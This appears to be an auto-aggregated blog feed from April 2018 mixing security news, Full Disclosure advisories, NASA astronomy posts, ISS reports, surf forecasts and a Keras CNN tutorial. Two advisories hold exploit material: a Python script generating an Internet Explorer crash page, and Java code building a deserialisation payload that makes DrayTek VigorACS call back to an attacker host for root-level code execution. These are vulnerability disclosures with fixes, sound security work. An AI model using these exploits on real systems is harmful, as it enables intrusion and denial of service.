Latest YouTube Video

Saturday, April 21, 2018

Flaw in LinkedIn AutoFill Plugin Lets Third-Party Sites Steal Your Data

Not just Facebook, a new vulnerability discovered in Linkedin's popular AutoFill functionality found leaking its users' sensitive information to third party websites without the user even knowing about it. LinkedIn provides an AutoFill plugin for a long time that other websites can use to let LinkedIn users quickly fill in profile data, including their full name, phone number, email address,


from The Hacker News https://ift.tt/2Hil0AG
via IFTTT

British Schoolboy Who Hacked CIA Director Gets 2-Year Prison Term

The British teenager who managed to hack into the online accounts of several high-profile US government employees sentenced to two years in prison on Friday. Kane Gamble, now 18, hacked into email accounts of former CIA director John Brennan, former Director of National Intelligence James Clapper, former FBI Deputy Director Mark Giuliano, and other senior FBI officials—all from his parent's


from The Hacker News https://ift.tt/2HJB91c
via IFTTT

[FD] [SE-2011-01] The origin and impact of vulnerabilities in ST chipsets

Hello All, We have published an initial document describing the origin and impact of the vulnerabilities discovered in ST chipsets along some rationale indicating why it's worth to dig further into this case: https://ift.tt/2vt3C6C This document is a work in progress. As such, it will be updated once new information is acquired regarding the impact of the issues found. ST vulnerabilities are still a mystery to many and we keep receiving inquiries about them regardless of the fact that almost 6 years had passed since the disclosure. STMicroelectronics, although out of STB and DVB chipset business, has not provided us with any details regarding the impact of the issues found. We have reasons to believe that vulnerable IP (TKD Crypto core of STi7111 SoC) might be part of other ST chipsets and/or part of other vendors' solutions, not necessarily related to PayTV industry (e-passports, banking cards and SIM cards). We have reasons to believe that ST actions were aimed to hide the impact of the issues found, that company's shareholders were not aware of these vulnerabilities, their impact and associated liabilities. We have reasons to believe that the issues have not been resolved up to this day. In Mar 2018, we asked CERT-FR (French governmental CSIRT) and IT-CERT (CERT Nazionale Italia) for assistance aimed at obtaining information from STMicroelectronics regarding security issues found in their chipsets (ST is a French-Italian company and both French and Italian governments hold 13.8% of its stake each). For some unknown reason, both CERTs have stopped responding to our messages [1]. We are still to hear from US-CERT. Over the last 20+ years, we have been dealing with various vendors and ecosystems (desktop, cloud, mobile, etc.). The case of STMicroelectronics vulnerabilities is however truly unique as we have never met with such a persistent and long-term refusal to provide information pertaining to the impact and addressing of security vulnerabilities found. The usual "crisis management" conducted by vendors for disclosures of high impact flaws involve carefully-worded statements indicating that the issues affect older products only or in case of low / limited impact flaws, a vendor usually publishes a list of vulnerable products to clearly emphasize the low nature of the issues found. ST refusal to provide any information pertaining to the impact of the flaws found in its chipsets can be perceived in terms of intentionally hiding the impact of a much larger magnitude than anticipated by the reporting party, customers or the public. It could be that these actions are aimed at avoiding the liabilities associated with manufacturing flawed products, the costs of their recalls and/or replacements. ST has all the means to end any speculation pertaining to the nature of the issues found in its chipsets and their impact by simply delivering clear impact information to general public (vulnerable chipset models, whether vulnerable IP is used in other products, possible remediation steps, etc). Security Explorations will continue engaging various entities such as US-CERT in a goal to acquire accurate information pertaining to the impact and addressing of ST vulnerabilities. The newly published document and our SE-2011-01 Vendor Status page will reflect any new information acquired and the steps taken to obtain it. We are also ready to release to the public all unpublished bits pertaining to our research of ST chipsets such as SRP-2018-01 [2] material if deemed necessary. Thank you. Best Regards, Adam Gowdiak

Source: Gmail -> IFTTT-> Blogger

TESS Launch Close Up


NASA's Transiting Exoplanet Survey Satellite (TESS) began its search for planets orbiting other stars by leaving planet Earth on April 18. The exoplanet hunter rode to orbit on top of a Falcon 9 rocket. The Falcon 9 is so designated for its 9 Merlin first stage engines seen in this sound-activated camera close-up from Space Launch Complex 40 at Cape Canaveral Air Force Station. In the coming weeks, TESS will use a series of thruster burns to boost it into a high-Earth, highly elliptical orbit. A lunar gravity assist maneuver will allow it to reach a previously untried stable orbit with half the orbital period of the Moon and a maximum distance from Earth of about 373,000 kilometers (232,000 miles). From there, TESS will carry out a two year survey to search for planets around the brightest and closest stars in the sky. via NASA https://ift.tt/2vChwDG

Friday, April 20, 2018

Orioles closer Zach Britton takes "pretty big" step in recovery from Achilles injury, throwing 20 pitches off a half-mound (ESPN)

from ESPN https://ift.tt/1eW1vUH
via IFTTT

[FD] wifi and z-wave smart home from zibreo

Hi manager, I'm Chris from Zibreo, a leading producer of home automation based in Shenzhen, China. 1) We have WiFi smart plug,water detector, PIR motion sensor, RGB bulb etc, they can work with Amazon Alexa, Google home, IFTTT. 2) Z-Wave devices are compatible with all of z-wave controllers in the market such as Fibaro, smartthings etc. 3) Battery-operated with 2-year lifetime. Contact me if you need further details. Thanks. Chris

Source: Gmail -> IFTTT-> Blogger

[FD] Microsoft (Win 10) InternetExplorer v11.371.16299.0 - Denial Of Service

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://ift.tt/2HEjHve [+] ISR: ApparitionSec Vendor: =======www.microsoft.com Product: ======== Internet Explorer (Windows 10) v11.371.16299.0 Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995. Vulnerability Type: ================== Denial Of Service CVE Reference: ============== N/A Security Issue: ================ A null pointer de-reference (read) results in an InternetExplorer Denial of Service (crash) when MSIE encounters an specially crafted HTML HREF tag containing an empty reference for certain Windows file types. Upon IE crash it will at times daringly attempt to restart itself, if that occurs and user is prompted by IE to restore their browser session, then selecting this option so far in my tests has shown to repeat the crash all over again. This can be leveraged by visiting a hostile webpage or link to crash an end users MSIE browser. Referencing some of the following extensions .exe:, .com:, .pif:, .bat: and .scr: should produce the same :) Tested Windows 10 Stack Dump: ========== (2e8c.27e4): Access violation - code c0000005 (first/second chance not available) ntdll!NtWaitForMultipleObjects+0x14: 00007ffa`be5f0e14 c3 ret 0:015> r rax=000000000000005b rbx=0000000000000003 rcx=0000000000000003 rdx=000000cca6efd3a8 rsi=0000000000000000 rdi=0000000000000003 rip=00007ffabe5f0e14 rsp=000000cca6efcfa8 rbp=0000000000000000 r8=0000000000000000 r9=0000000000000000 r10=0000000000000000 r11=0000000000000246 r12=0000000000000010 r13=000000cca6efd3a8 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 ntdll!NtWaitForMultipleObjects+0x14: 00007ffa`be5f0e14 c3 ret CONTEXT: (.ecxr) rax=0000000000000000 rbx=000001fd4a2ec9d8 rcx=0000000000000000 rdx=00007ffabb499398 rsi=000001fd4a5b0ce0 rdi=0000000000000000 rip=00007ffabb7fc646 rsp=000000cca6efe4f8 rbp=000000cca6efe600 r8=0000000000000000 r9=0000000000008000 r10=00007ffabb499398 r11=0000000000000000 r12=0000000000000000 r13=00007ffabb48d060 r14=0000000000000002 r15=0000000000000001 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 KERNELBASE!StrCmpICW+0x6: 00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11] ds:00000000`00000000=???? Resetting default scope FAULTING_IP: KERNELBASE!StrCmpICW+6 00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11] EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 00007ffabb7fc646 (KERNELBASE!StrCmpICW+0x0000000000000006) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 0000000000000000 Parameter[1]: 0000000000000000 Attempt to read from address 0000000000000000 DEFAULT_BUCKET_ID: NULL_POINTER_READ PROCESS_NAME: iexplore.exe POC video URL: ==============https://ift.tt/2JeIZx3 Exploit/POC: ============ 1) Run below python script to create "IE-Win10-Crasha.html" 2) Open IE-Win10-Crasha.html in InternetExplorer v11.371.16299 on Windows 10 payload=('
\n'+ '
MSIE v11.371.16299 Denial Of Service by hyp3rlinx
\n'+ 'crashy ware shee\n'+ '
\n'+ 'Tested successfully on Windows 10\n'+ '
') file=open("IE-Win10-Crasha.html","w") file.write(payload) file.close() print 'MS InternetExplorer (Win 10) ' print 'Denial Of Service File Created.' print 'hyp3rlinx' Network Access: =============== Remote Severity: ========= Medium Disclosure Timeline: ============================= Vendor Notification: April 18, 2018 vendor closes thread : April 19, 2018 April 20, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

Source: Gmail -> IFTTT-> Blogger

anonymous henchmen interview

LISA LEMON GETS THE ANONYMOUS HENCHMEN ON THE PHONE!

from Google Alert - anonymous https://ift.tt/2HDXDAF
via IFTTT

ISS Daily Summary Report – 4/19/2018

Miniature Exercise Device (MED-2):  The crew set up cameras in Node 3 to capture video from multiple views of the Advanced Resistive Exercise Device (ARED) and MED-2 hardware.  They applied body markers, performed dead lifts and rowing exercises and then transferred the video for downlink.  The ISS’s exercise equipment is large and bulky, while the … Continue reading "ISS Daily Summary Report – 4/19/2018"

from ISS On-Orbit Status Report https://ift.tt/2vsqCml
via IFTTT

8th St.'s surf is at least 5.36ft high

Maryland-Delaware, April 26, 2018 at 04:00AM

8th St. Summary
At 4:00 AM, surf min of 5.36ft. At 10:00 AM, surf min of 4.46ft. At 4:00 PM, surf min of 3.41ft. At 10:00 PM, surf min of 2.43ft.

Surf maximum: 6.36ft (1.94m)
Surf minimum: 5.36ft (1.63m)
Tide height: 3.22ft (0.98m)
Wind direction: WSW
Wind speed: 11.02 KTS


from Surfline https://ift.tt/1kVmigH
via IFTTT

[FD] Foxit Reader 8.3.1.21155 ( Unsafe DLL Loading Vulnerability )

Author: Ye Yint Min Thu Htut 1. OVERVIEW The Foxit Reader is vulnerable to Insecure DLL Hijacking Vulnerability. Similar terms that describe this vulnerability have been come up with Remote Binary Planting, and Insecure DLL Loading/Injection/Hijacking/Preloading. 2. PRODUCT DESCRIPTION Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files. Foxit Reader is developed by Fremont, California-based Foxit Software Incorporated. Early versions of Foxit Reader were notable for startup performance and small file size. 3. VULNERABILITY DESCRIPTION The Foxit Reader application passes an insufficiently qualified path in loading an external library when a user launch the application Affected Library List

Source: Gmail -> IFTTT-> Blogger

[FD] [CVE-2017-5641] - DrayTek Vigor ACS 2 Java Deserialisation RCE

Hi all, tl;dr DrayTek Vigor ACS server, a remote enterprise management system for DrayTek routers, uses a vulnerable version of the Adobe / Apache Flex Java library that has a deserialisation vulnerability. This can be exploited by an unauthenticated attacker to achieve RCE as root / SYSTEM on all versions until 2.2.2. Full advisory is below, and a copy of it plus the exploit code is in my repo https://ift.tt/2F2oVLO. Thanks to Beyond Security SSD programme for helping me disclose this vulnerability to the vendor. You can find details on their blog at https://ift.tt/2qFTjqa ==== >> DrayTek VigorACS 2 Unsafe Flex AMF Java Object Deserialization >> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security ================================================================================= Disclosure: 18/04/2018 / Last updated: 19/04/2018 >> Background and summary From the vendor's website [1]: "VigorACS 2 is a powerful centralized management software for Vigor Routers and VigorAPs, it is an integrated solution for configuring, monitoring, and maintenance of multiple Vigor devices from a single portal. VigorACS 2 is based on TR-069 standard, which is an application layer protocol that provides the secure communication between the server and CPEs, and allows Network Administrator to manage all the Vigor devices (CPEs) from anywhere on the Internet. VigorACS 2 Central Management is suitable for the enterprise customers with a large scale of DrayTek routers and APs, or the System Integrator who need to provide a real-time service for their customer's DrayTek devices." VigorACS is a Java application that runs on both Windows and Linux. It exposes a number of servlets / endpoints under /ACSServer, which are used for various functions of VigorACS, such as the management of routers and firewalls using the TR-069 protocol [2]. One of the endpoints exposed by VigorACS, at /ACSServer/messabroker/amf, is an Adobe/Apache Flex service that is reachable by the managed routers and firewalls. This advisory shows that VigorACS uses a Flex version is vulnerable to CVE-2017-5641 [3], a vulnerability related to unsafe Java deserialization for Flex AMF objects, which can be abused to achieve unauthenticated remote code execution as root under Linux or SYSTEM under Windows. This vulnerability was disclosed under Beyond Security SecuriTeam Secure Disclosure (SSD) programme, which have provided assistance to the vendor throughout the disclosure process [4]. >> Technical details: Vulnerability: Unsafe Flex AMF Java Object Deserialization CVE-2017-5641 Attack Vector: Remote Constraints: None; exploitable by an unauthenticated attacker Affected versions: confirmed on v2.2.1; earlier versions most likely affected By sending an HTTP POST request with random data to /ACSServer/messagebroker/amf, the server will respond with a 200 OK and binary data that includes: ...Unsupported AMF version XXXXX... While in the server logs, a stack trace will be produced that includes the following: flex.messaging.io.amf.AmfMessageDeserializer.readMessage ... flex.messaging.endpoints.amf.SerializationFilter.invoke ... ... A quick Internet search revealed CVE-2017-5641 [3], which clearly states in its description: "Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution." Further reading in [5], [6] and [7] led to proof of concept code (Appendix A) that creates a binary payload that can be exploited to achieve remote code execution through unsafe Java deserialization. A fully working exploit has been released with this advisory that works in the following way: a) sends an AMF binary payload to /ACSServer/messagebroker/amf as described in [6] to trigger a Java Remote Method Protocol (JRMP) call back to the attacker b) receives the JRMP connection with ysoserial's JRMP listener [8] c) configures ysoserial to respond with a CommonsCollections5 or CommonsCollections6 payload, as a vulnerable version of Apache Commons 3.1 is in the Java classpath of the server d) executes code as root / SYSTEM The exploit has been tested against the Linux and Windows Vigor ACS 2.2.1, although it requires a ysoserial jar patched for multi argument handling (a separate branch in [8], or alternative a ysoserial patched with CommonsCollections5Chained or CommonsCollections6Chained - see [9]). Appendix A contains the Java code used to generate the AMF payload that will be sent in step a). This code is very similar to the one in [6], and it is highly recommended to read that advisory by Markus Wulftange of Code White for a better understanding of this vulnerability. A copy of the Java source code in Appendix A, together with the actual exploit code and the ysoserial patch needed to enable multi argument handling can be fetched from [10]. >> Fix: Upgrade to DrayTek VigorACS version 2.2.2 as per the vendor instructions [11]. >> Appendix A: === import flex.messaging.io.amf.MessageBody; import flex.messaging.io.amf.ActionMessage; import flex.messaging.io.SerializationContext; import flex.messaging.io.amf.AmfMessageSerializer; import java.io.*; public class ACSFlex { public static void main(String[] args) { Object unicastRef = generateUnicastRef(args[0], Integer.parseInt(args[1])); // serialize object to AMF message try { byte[] amf = new byte[0]; amf = serialize((unicastRef)); DataOutputStream os = new DataOutputStream(new FileOutputStream(args[2])); os.write(amf); System.out.println("Done, payload written to " + args[2]); } catch (IOException e) { e.printStackTrace(); } } public static Object generateUnicastRef(String host, int port) { java.rmi.server.ObjID objId = new java.rmi.server.ObjID(); sun.rmi.transport.tcp.TCPEndpoint endpoint = new sun.rmi.transport.tcp.TCPEndpoint(host, port); sun.rmi.transport.LiveRef liveRef = new sun.rmi.transport.LiveRef(objId, endpoint, false); return new sun.rmi.server.UnicastRef(liveRef); } public static byte[] serialize(Object data) throws IOException { MessageBody body = new MessageBody(); body.setData(data); ActionMessage message = new ActionMessage(); message.addBody(body); ByteArrayOutputStream out = new ByteArrayOutputStream(); AmfMessageSerializer serializer = new AmfMessageSerializer(); serializer.initialize(SerializationContext.getSerializationContext(), out, null); serializer.writeMessage(message); return out.toByteArray(); } } === >> References: [1] https://ift.tt/2F1qWIl [2] https://ift.tt/2HKSsMZ [3] https://ift.tt/2vwN7q8 [4] https://ift.tt/2qFTjqa [5] https://ift.tt/2nXrCHF [6] https://ift.tt/2vxuPVS [7] https://ift.tt/2q7G18y [8] https://ift.tt/1MlRZLw [9] https://ift.tt/2HPzyVy [10] https://ift.tt/2F2oVLO [11] https://ift.tt/2vwN9OM ================ Agile Information Security Limited https://ift.tt/1JewOIU >> Enabling secure digital business >>

Source: Gmail -> IFTTT-> Blogger

Moon in the Hyades


Have you seen the Moon lately? On April 18, its waxing sunlit crescent moved through planet Earth's night across a background of stars in the Hyades. Anchored by bright star Aldebaran, the nearby, V-shaped star cluster and complete lunar orb appear in this telephoto image. The engaging skyview is actually digitally composed from a series of varying exposures. Recorded in 1/60th of a second, the shortest in the series captures the Moon's bright crescent in sharp detail. Longer exposures, ranging up to 15 seconds, capture fainter background stars as well as earthshine, visible to the eye as the earthlit lunar night side. via NASA https://ift.tt/2Hf5SUw

Thursday, April 19, 2018

Over 2 Million Users Installed Malicious Ad Blockers From Chrome Store

If you have installed any of the below-mentioned Ad blocker extension in your Chrome browser, you could have been hacked. A security researcher has spotted five malicious ad blockers extension in the Google Chrome Store that had already been installed by at least 20 million users. Unfortunately, malicious browser extensions are nothing new. They often have access to everything you do online


from The Hacker News https://ift.tt/2HeOSto
via IFTTT

[FD] Seagate Media Server path traversal vulnerability

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Seagate Media Server stored Cross-Site Scripting vulnerability

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Seagate Personal Cloud allows moving of arbitrary files

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

9 Popular Training Courses to Learn Ethical Hacking Online

How to become a Professional Hacker? This is one of the most frequently asked queries we came across on a daily basis. Do you also want to learn real-world hacking techniques but don’t know where to start? This week's THN deal is for you. Today THN Deal Store has announced a new Super-Sized Ethical Hacking Bundle that let you get started your career in hacking and penetration testing


from The Hacker News https://ift.tt/2sDNLki
via IFTTT

ISS Daily Summary Report – 4/18/2018

Ku Control Unit (KCU) Software Transition: Following yesterday’s swap to KCU2, running the new R4 software, the KCU2 modem card stopped processing Ku forward commands. An eventual power cycle of the entire KCU2 unit recovered KCU2 forward link. Later the KCU2 modem card once again stopped processing Ku forward commands. Ku was transitioned back to … Continue reading "ISS Daily Summary Report – 4/18/2018"

from ISS On-Orbit Status Report https://ift.tt/2HdTkIZ
via IFTTT

Facebook Plans to Build Its Own Chips For Hardware Devices

A new job opening post on Facebook suggests that the social network is forming a team to build its own hardware chips, joining other tech titans like Google, Apple, and Amazon in becoming more self-reliant. According to the post, Facebook is looking for an expert in ASIC and FPGA—two custom silicon designs to help it evaluate, develop and drive next-generation technologies within Facebook—


from The Hacker News https://ift.tt/2F03GtX
via IFTTT

'iTunes Wi-Fi Sync' Feature Could Let Attackers Hijack Your iPhone, iPad Remotely

Be careful while plugging your iPhone into a friend's laptop for a quick charge or sharing selected files. Researchers at Symantec have issued a security warning for iPhone and iPad users about a new attack, which they named "TrustJacking," that could allow someone you trust to remotely take persistent control of, and extract data from your Apple device. Apple provides an iTunes Wi-Fi sync


from The Hacker News https://ift.tt/2JXWJ0c
via IFTTT

Practicalities of anonymous marking

Anonymous marking of assessments with written elements is now in effect across the University. A variety of enterprise tools allow coordinators and markers to assess student work in this way to avoid unconscious or conscious bias. Using Turnitin for similarity detection and marking, assignments can be ...

from Google Alert - anonymous https://ift.tt/2HfQOlL
via IFTTT

Another Critical Flaw Found In Drupal Core—Patch Your Sites Immediately

It's time to update your Drupal websites, once again. For the second time within a month, Drupal has been found vulnerable to another critical vulnerability that could allow remote attackers to pull off advanced attacks including cookie theft, keylogging, phishing and identity theft. Discovered by the Drupal security team, the open source content management framework is vulnerable to


from The Hacker News https://ift.tt/2qKYDJ3
via IFTTT

NGC 7635: The Bubble Nebula


Blown by the wind from a massive star, this interstellar apparition has a surprisingly familiar shape. Cataloged as NGC 7635, it is also known simply as The Bubble Nebula. Although it looks delicate, the 7 light-year diameter bubble offers evidence of violent processes at work. Above and left of the Bubble's center is a hot, O-type star, several hundred thousand times more luminous and some 45 times more massive than the Sun. A fierce stellar wind and intense radiation from that star has blasted out the structure of glowing gas against denser material in a surrounding molecular cloud. The intriguing Bubble Nebula and associated cloud complex lie a mere 7,100 light-years away toward the boastful constellation Cassiopeia. This sharp, tantalizing view of the cosmic bubble is a composite of Hubble Space Telescope image data from 2016, reprocessed to present the nebula's intense narrowband emission in an approximate true color scheme. via NASA https://ift.tt/2HBnKIw

Wednesday, April 18, 2018

Anonymous donor leaves $10 million for Seattle's KEXP

It's believed to be the single largest donation ever received by a public radio station, and it went to Seattle's iconic KEXP. $10 million. Left behind by a woman identified only as Suzanne who died in 2016, younger than anyone who knew her at the station expected. "What an amazing legacy she left and ...

from Google Alert - anonymous https://ift.tt/2qKCPwS
via IFTTT

Basic Blocks are not visible for Anonymous users

Basic blocks are no longer visible to the anonymous user unless the role has the Administer blocks permissions enabled. This is a huge security issue of course. For the time being to keep the site working I've completely removed access to structure/block and block edit pages directly from the web server ...

from Google Alert - anonymous https://ift.tt/2J6sP8N
via IFTTT

Critical Unpatched RCE Flaw Disclosed in LG Network Storage Devices

If you have installed a network-attached storage device manufactured by LG Electronics, you should take it down immediately, read this article carefully and then take appropriate action to protect your sensitive data. A security researcher has revealed complete technical details of an unpatched critical remote command execution vulnerability in various LG NAS device models that could let


from The Hacker News https://ift.tt/2H7owO2
via IFTTT

ISS Daily Summary Report – 4/17/2018

Metabolic Tracking (MT): The crew set up the hardware and materials to support two separate sessions of thawing and inoculation today for the MT investigation. They injected the thawed inoculum into multiwell BioCells, and inserted them into a NanoRacks Plate Reader.  Samples were placed into a Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI).  … Continue reading "ISS Daily Summary Report – 4/17/2018"

from ISS On-Orbit Status Report https://ift.tt/2Hudmm5
via IFTTT

Suspected 'Big Bitcoin Heist' Mastermind Fled to Sweden On Icelandic PM's Plane

Remember the "Big bitcoin heist" we reported last month when a group of thieves stole around 600 powerful bitcoin mining devices from Icelandic data centers? Icelandic Police had arrested 11 suspects as part of the investigation, one of which has escaped from prison and fled to Sweden on a passenger plane reportedly also carrying the Icelandic prime minister Katrin Jakobsdottir. Sindri Thor


from The Hacker News https://ift.tt/2J6eIQS
via IFTTT

Hackers Exploiting Drupal Vulnerability to Inject Cryptocurrency Miners

The Drupal vulnerability (CVE-2018-7600), dubbed Drupalgeddon2 that could allow attackers to completely take over vulnerable websites has now been exploited in the wild to deliver malware backdoors and cryptocurrency miners. Drupalgeddon2, a highly critical remote code execution vulnerability discovered two weeks ago in Drupal content management system software, was recently patched by the


from The Hacker News https://ift.tt/2J2u4pJ
via IFTTT

CCleaner Attack Timeline—Here's How Hackers Infected 2.3 Million PCs

Last year, the popular system cleanup software CCleaner suffered a massive supply-chain malware attack of all times, wherein hackers compromised the company's servers for more than a month and replaced the original version of the software with the malicious one. The malware attack infected over 2.3 million users who downloaded or updated their CCleaner app between August and September last


from The Hacker News https://ift.tt/2qFNxF2
via IFTTT

Milky Way over Deadvlei in Namibia


What planet is this? It is the only planet currently known to have trees. The trees in Deadvlei, though, have been dead for over 500 years. Located in Namib-Naukluft Park in Namibia (Earth), saplings grew after rainfall caused a local river to overflow, but died after sand dunes shifted to section off the river. High above and far in the distance, the band of our Milky Way Galaxy forms an arch over a large stalk in this well-timed composite image, taken last month. The soil of white clay appears to glow by reflected starlight. Rising on the left, under the Milky Way's arch, is a band of zodiacal light -- sunlight reflected by dust orbiting in the inner Solar System. On the right, just above one of Earth's larger sand dunes, an astute eye can find the Large Magellanic Cloud, a satellite galaxy of our galaxy. Finding the Small Magellanic Cloud in the featured image, though, is perhaps too hard. via NASA https://ift.tt/2J4DFMA

Tuesday, April 17, 2018

[FD] Kodi <= 17.6 - Persistent Cross-Site Scripting

============================================= MGC ALERT 2018-003 - Original release date: March 19, 2018 - Last revised: April 16, 2018 - Discovered by: Manuel Garcia Cardenas - Severity: 4,8/10 (CVSS Base Score) - CVE-ID: CVE-2018-8831 ============================================= I. VULNERABILITY

Source: Gmail -> IFTTT-> Blogger

Intel Processors Now Allows Antivirus to Use Built-in GPUs for Malware Scanning

Global chip-maker Intel on Tuesday announced two new technologies—Threat Detection Technology (TDT) and Security Essentials—that not only offer hardware-based built-in security features across Intel processors but also improve threat detection without compromising system performance. Intel's Threat Detection Technology (TDT) offers a new set of features that leverage hardware-level telemetry


from The Hacker News https://ift.tt/2qD4cK5
via IFTTT

ISS Daily Summary Report – 4/16/2018

Metabolic Tracking (MT): Earlier today the crew set up the MT hardware and materials for thawing and inoculation. They then injected the thawed inoculum into multiwell BioCells, and inserted them into a NanoRacks Plate Reader.  The crew also took samples from the BioCell B group and placed them into a Minus Eighty Degree Celsius Laboratory … Continue reading "ISS Daily Summary Report – 4/16/2018"

from ISS On-Orbit Status Report https://ift.tt/2qE9t4l
via IFTTT

8th St.'s surf is Good

April 16, 2018 at 08:00PM, the surf is Good!

8th St. Summary


Surf: waist to shoulder high
Maximum: 1.224m (4.02ft)
Minimum: 0.918m (3.01ft)

Maryland-Delaware Summary


from Surfline https://ift.tt/1kVmigH
via IFTTT

Microsoft built its own custom Linux OS to secure IoT devices

Finally, it's happening. Microsoft has built its own custom Linux kernel to power "Azure Sphere," a newly launched technology that aims to better secure billions of "Internet of things" devices by combining the custom Linux kernel with new chip design, and its cloud security service. Project Azure Sphere focuses on protecting microcontroller-based IoT devices, including smart appliances,


from The Hacker News https://ift.tt/2qEzU9g
via IFTTT

Anon

It's the best way to get information from your friends or anyone else. Ask questions with or without your name: the best thing is, you don't need to wait until they see it. If somebody else also knows the answer, they can leave a response, even anonymously If you want to know something really personal, ...

from Google Alert - anonymous https://ift.tt/2qBZyv2
via IFTTT

Monday, April 16, 2018

ISS Daily Summary Report – 4/13/2018

Metabolic Tracking (MT): Today the crew injected thawed inoculum into multiwell BioCells, which were then inserted into a NanoRacks Plate Reader.  The crew also took samples from the BioCell A group and collected surface and air samples while photographing each location.  The samples were placed into a Minus Eighty Degree Celsius Laboratory Freezer for ISS … Continue reading "ISS Daily Summary Report – 4/13/2018"

from ISS On-Orbit Status Report https://ift.tt/2qBkX8I
via IFTTT

Keras and Convolutional Neural Networks (CNNs)

Creating a Convolutional Neural Network using Keras to recognize a Bulbasaur stuffed Pokemon [image source]

Today’s blog post is part two in a three-part series on building a complete end-to-end image classification + deep learning application:

By the end of today’s blog post, you will understand how to implement, train, and evaluate a Convolutional Neural Network on your own custom dataset.

And in next week’s post, I’ll be demonstrating how you can take your trained Keras model and deploy it to a smartphone app with just a few lines of code!

To keep the series lighthearted and fun, I am fulfilling a childhood dream of mine and building a Pokedex. A Pokedex is a device that exists in the world of Pokemon, a popular TV show, video game, and trading card series (I was/still am a huge Pokemon fan).

If you are unfamiliar with Pokemon, you should think of a Pokedex as a smartphone app that can recognize Pokemon, the animal-like creatures that exist in the world of Pokemon.

You can swap in your own datasets of course, I’m just having fun and enjoying a bit of childhood nostalgia.

To learn how to train a Convolutional Neural Network with Keras and deep learning on your own custom dataset, just keep reading.

Looking for the source code to this post?
Jump right to the downloads section.

Keras and Convolutional Neural Networks

In last week’s blog post we learned how we can quickly build a deep learning image dataset — we used the procedure and code covered in the post to gather, download, and organize our images on disk.

Now that we have our images downloaded and organized, the next step is to train a Convolutional Neural Network (CNN) on top of the data.

I’ll be showing you how to train your CNN in today’s post using Keras and deep learning. The final part of this series, releasing next week, will demonstrate how you can take your trained Keras model and deploy it to a smartphone (in particular, iPhone) with only a few lines of code.

The end goal of this series is to help you build a fully functional deep learning app — use this series as an inspiration and starting point to help you build your own deep learning applications.

Let’s go ahead and get started training a CNN with Keras and deep learning.

Our deep learning dataset

Figure 1: A montage of samples from our Pokemon deep learning dataset depicting each of the classes (i.e., Pokemon species). As we can see, the dataset is diverse, including illustrations, movie/TV show stills, action figures, toys, etc.

Our deep learning dataset consists of 1,191 images of Pokemon, (animal-like creatures that exist in the world of Pokemon, the popular TV show, video game, and trading card series).

Our goal is to train a Convolutional Neural Network using Keras and deep learning to recognize and classify each of these Pokemon.

The Pokemon we will be recognizing include:

A montage of the training images for each class can be seen in Figure 1 above.

As you can see, our training images include a mix of:

  • Still frames from the TV show and movies
  • Trading cards
  • Action figures
  • Toys and plushes
  • Drawings and artistic renderings from fans

This diverse mix of training images will allow our CNN to recognize our five Pokemon classes across a range of images — and as we’ll see, we’ll be able to obtain 97%+ classification accuracy!

The Convolutional Neural Network and Keras project structure

Today’s project has several moving parts — to help us wrap our head around the project, let’s start by reviewing our directory structure for the project:

├── dataset
│   ├── bulbasaur [234 entries]
│   ├── charmander [238 entries]
│   ├── mewtwo [239 entries]
│   ├── pikachu [234 entries]
│   └── squirtle [223 entries]
├── examples [6 entries]
├── pyimagesearch
│   ├── __init__.py
│   └── smallervggnet.py
├── plot.png
├── lb.pickle
├── pokedex.model
├── classify.py
└── train.py

There are 3 directories:

  1. dataset
    
     : Contains the five classes, each class is its own respective subdirectory to make parsing class labels easy.
  2. examples
    
     : Contains images we’ll be using to test our CNN.
  3. The
    pyimagesearch
    
      module: Contains our
    SmallerVGGNet
    
      model class (which we’ll be implementing later in this post).

And 5 files in the root:

  1. plot.png
    
     : Our training/testing accuracy and loss plot which is generated after the training script is ran.
  2. lb.pickle
    
     : Our
    LabelBinarizer
    
      serialized object file — this contains a class index to class name lookup mechamisn.
  3. pokedex.model
    
     : This is our serialized Keras Convolutional Neural Network model file (i.e., the “weights file”).
  4. train.py
    
     : We will use this script to train our Keras CNN, plot the accuracy/loss, and then serialize the CNN and label binarizer to disk.
  5. classify.py
    
     : Our testing script.

Our Keras and CNN architecture

Figure 2: A VGGNet-like network that I’ve dubbed “SmallerVGGNet” will be used for training a deep learning classifier with Keras. You can find the full resolution version of this network architecture diagram here.

The CNN architecture we will be utilizing today is a smaller, more compact variant of the VGGNet network, introduced by Simonyan and Zisserman in their 2014 paper, Very Deep Convolutional Networks for Large Scale Image Recognition.

VGGNet-like architectures are characterized by:

  1. Using only 3×3 convolutional layers stacked on top of each other in increasing depth
  2. Reducing volume size by max pooling
  3. Fully-connected layers at the end of the network prior to a softmax classifier

